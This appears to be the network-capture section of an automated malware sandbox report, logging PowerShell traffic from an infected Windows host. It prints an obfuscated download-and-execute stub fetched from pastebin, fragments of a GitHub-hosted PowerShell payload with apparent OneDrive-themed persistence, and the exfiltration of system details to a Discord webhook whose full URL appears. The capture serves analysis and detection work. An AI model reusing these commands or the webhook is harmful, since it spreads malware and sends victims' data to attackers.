                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                              Oct 15, 2024 18:09:19.191517115 CEST472INHTTP/1.1 301 Moved Permanently
                                                              Date: Tue, 15 Oct 2024 16:09:18 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: keep-alive
                                                              Cache-Control: max-age=3600
                                                              Expires: Tue, 15 Oct 2024 17:09:18 GMT
                                                              Location: https://pastebin.com/raw/sA04Mwk2
                                                              Server: cloudflare
                                                              CF-RAY: 8d3112a2e9a8e779-DFW
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                              Oct 15, 2024 18:09:19.191989899 CEST472INHTTP/1.1 301 Moved Permanently
                                                              Date: Tue, 15 Oct 2024 16:09:18 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: keep-alive
                                                              Cache-Control: max-age=3600
                                                              Expires: Tue, 15 Oct 2024 17:09:18 GMT
                                                              Location: https://pastebin.com/raw/sA04Mwk2
                                                              Server: cloudflare
                                                              CF-RAY: 8d3112a2e9a8e779-DFW
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.849716185.199.110.133806592C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              Oct 15, 2024 18:09:20.066643953 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Host: raw.githubusercontent.com
                                                              Connection: Keep-Alive
                                                              Oct 15, 2024 18:09:20.680052996 CEST541INHTTP/1.1 301 Moved Permanently
                                                              Connection: close
                                                              Content-Length: 0
                                                              Server: Varnish
                                                              Retry-After: 0
                                                              Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                              Accept-Ranges: bytes
                                                              Date: Tue, 15 Oct 2024 16:09:20 GMT
                                                              Via: 1.1 varnish
                                                              X-Served-By: cache-dfw-kdal2120088-DFW
                                                              X-Cache: HIT
                                                              X-Cache-Hits: 0
                                                              X-Timer: S1729008561.622079,VS0,VE0
                                                              Access-Control-Allow-Origin: *
                                                              Cross-Origin-Resource-Policy: cross-origin
                                                              Expires: Tue, 15 Oct 2024 16:14:20 GMT
                                                              Vary: Authorization,Accept-Encoding


                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.849707162.159.128.2334433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-15 16:09:10 UTC333OUTPOST /api/webhooks/1295751633158013021/9BlOhZ44xUrKpF4r8Of10VnlPL1j_-N82dLUs1Hltnp-q8JOliKVAh5eIY85DUg3JNh4 HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Content-Type: application/json
                                                              Host: discord.com
                                                              Content-Length: 216
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              2024-10-15 16:09:10 UTC25INHTTP/1.1 100 Continue
                                                              2024-10-15 16:09:10 UTC216OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 2a 2a 68 75 62 65 72 74 2a 2a 20 68 61 73 20 6a 6f 69 6e 65 64 20 2d 20 50 68 53 68 6f 70 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 4f 32 46 38 35 54 53 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 22 0d 0a 7d
                                                              Data Ascii: { "content": "**user** has joined - PhShop\n----------------------------------\n**GPU:** O2F85TS\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4"}
                                                              2024-10-15 16:09:11 UTC1369INHTTP/1.1 204 No Content
                                                              Date: Tue, 15 Oct 2024 16:09:11 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Connection: close
                                                              set-cookie: __dcfduid=d079e0bc8b0f11ef9769da078b72aa88; Expires=Sun, 14-Oct-2029 16:09:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                              x-ratelimit-limit: 5
                                                              x-ratelimit-remaining: 4
                                                              x-ratelimit-reset: 1729008552
                                                              x-ratelimit-reset-after: 1
                                                              via: 1.1 google
                                                              alt-svc: h3=":443"; ma=86400
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tbFOlUZuDGRAOyCJnXlnhXuMmg5KHMf1TeSvfQ4cD28bjpbf79ioJqJI%2BZBbzSYRfUQ4JBY43Ye6z0%2FXfrUq2orcYMKvuRmBYpOUdL%2FK1iStsl6JuyAcAK3etU8p"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              X-Content-Type-Options: nosniff
                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                              Set-Cookie: __sdcfduid=d079e0bc8b0f11ef9769da078b72aa88f53164f87ea0056e3dd01f94449cb6a2973506e52256fd214127b60e12e11b5e; Expires=Sun, 14-Oct-2029 16:09:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                              Set-Cookie: __cfruid=ec3f5447db41c0e4c41d13d850734fe66310aeb5-1729008551; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                              Set-Cookie: _cf
                                                              2024-10-15 16:09:11 UTC196INData Raw: 75 76 69 64 3d 43 53 79 5a 57 47 39 75 35 76 30 68 47 50 33 65 79 30 4c 6b 33 6f 64 6e 31 53 67 59 57 73 72 76 78 45 5a 4f 6f 5f 37 36 67 4d 67 2d 31 37 32 39 30 30 38 35 35 31 30 34 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 33 31 31 32 37 31 34 39 34 33 36 63 34 34 2d 44 46 57 0d 0a 0d 0a
                                                              Data Ascii: uvid=CSyZWG9u5v0hGP3ey0Lk3odn1SgYWsrvxEZOo_76gMg-1729008551040-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d31127149436c44-DFW


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.849710172.67.19.244435884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-15 16:09:11 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Host: pastebin.com
                                                              Connection: Keep-Alive
                                                              2024-10-15 16:09:11 UTC397INHTTP/1.1 200 OK
                                                              Date: Tue, 15 Oct 2024 16:09:11 GMT
                                                              Content-Type: text/plain; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              x-frame-options: DENY
                                                              x-content-type-options: nosniff
                                                              x-xss-protection: 1;mode=block
                                                              cache-control: public, max-age=1801
                                                              CF-Cache-Status: HIT
                                                              Age: 670
                                                              Last-Modified: Tue, 15 Oct 2024 15:58:01 GMT
                                                              Server: cloudflare
                                                              CF-RAY: 8d311276ee202873-DFW
                                                              2024-10-15 16:09:11 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                              Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                              2024-10-15 16:09:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.849713185.199.110.1334435884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-15 16:09:12 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Host: raw.githubusercontent.com
                                                              Connection: Keep-Alive
                                                              2024-10-15 16:09:13 UTC900INHTTP/1.1 200 OK
                                                              Connection: close
                                                              Content-Length: 7508
                                                              Cache-Control: max-age=300
                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                              Content-Type: text/plain; charset=utf-8
                                                              ETag: "3c1076fda9d7a9f1de3ceb011a6f68a3886388e35b154b66990b49e988bc5cbd"
                                                              Strict-Transport-Security: max-age=31536000
                                                              X-Content-Type-Options: nosniff
                                                              X-Frame-Options: deny
                                                              X-XSS-Protection: 1; mode=block
                                                              X-GitHub-Request-Id: 47F7:29E79C:808B02:8D3F30:670E7B3C
                                                              Accept-Ranges: bytes
                                                              Date: Tue, 15 Oct 2024 16:09:13 GMT
                                                              Via: 1.1 varnish
                                                              X-Served-By: cache-dfw-kdal2120066-DFW
                                                              X-Cache: HIT
                                                              X-Cache-Hits: 1
                                                              X-Timer: S1729008553.051702,VS0,VE5
                                                              Vary: Authorization,Accept-Encoding,Origin
                                                              Access-Control-Allow-Origin: *
                                                              Cross-Origin-Resource-Policy: cross-origin
                                                              X-Fastly-Request-ID: d2da860ce0a493f68102d34bd66e086d01ec7dec
                                                              Expires: Tue, 15 Oct 2024 16:14:13 GMT
                                                              Source-Age: 252
                                                              2024-10-15 16:09:13 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                              Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                              2024-10-15 16:09:13 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                              Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                              2024-10-15 16:09:13 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                              Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                              2024-10-15 16:09:13 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                              Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                              2024-10-15 16:09:13 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                              Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                              2024-10-15 16:09:13 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                              Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.849715172.67.19.244436592C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-15 16:09:19 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Host: pastebin.com
                                                              Connection: Keep-Alive
                                                              2024-10-15 16:09:19 UTC397INHTTP/1.1 200 OK
                                                              Date: Tue, 15 Oct 2024 16:09:19 GMT
                                                              Content-Type: text/plain; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              x-frame-options: DENY
                                                              x-content-type-options: nosniff
                                                              x-xss-protection: 1;mode=block
                                                              cache-control: public, max-age=1801
                                                              CF-Cache-Status: HIT
                                                              Age: 678
                                                              Last-Modified: Tue, 15 Oct 2024 15:58:01 GMT
                                                              Server: cloudflare
                                                              CF-RAY: 8d3112ab8dc68c56-DFW
                                                              2024-10-15 16:09:19 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                              Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                              2024-10-15 16:09:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.849717185.199.110.1334436592C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-15 16:09:21 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Host: raw.githubusercontent.com
                                                              Connection: Keep-Alive
                                                              2024-10-15 16:09:21 UTC900INHTTP/1.1 200 OK
                                                              Connection: close
                                                              Content-Length: 7508
                                                              Cache-Control: max-age=300
                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                              Content-Type: text/plain; charset=utf-8
                                                              ETag: "3c1076fda9d7a9f1de3ceb011a6f68a3886388e35b154b66990b49e988bc5cbd"
                                                              Strict-Transport-Security: max-age=31536000
                                                              X-Content-Type-Options: nosniff
                                                              X-Frame-Options: deny
                                                              X-XSS-Protection: 1; mode=block
                                                              X-GitHub-Request-Id: 47F7:29E79C:808B02:8D3F30:670E7B3C
                                                              Accept-Ranges: bytes
                                                              Date: Tue, 15 Oct 2024 16:09:21 GMT
                                                              Via: 1.1 varnish
                                                              X-Served-By: cache-dfw-kdfw8210168-DFW
                                                              X-Cache: HIT
                                                              X-Cache-Hits: 1
                                                              X-Timer: S1729008561.402222,VS0,VE1
                                                              Vary: Authorization,Accept-Encoding,Origin
                                                              Access-Control-Allow-Origin: *
                                                              Cross-Origin-Resource-Policy: cross-origin
                                                              X-Fastly-Request-ID: 7e78c86105ddf4293c74877caa4dc067927ca41f
                                                              Expires: Tue, 15 Oct 2024 16:14:21 GMT
                                                              Source-Age: 261
                                                              2024-10-15 16:09:21 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                              Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
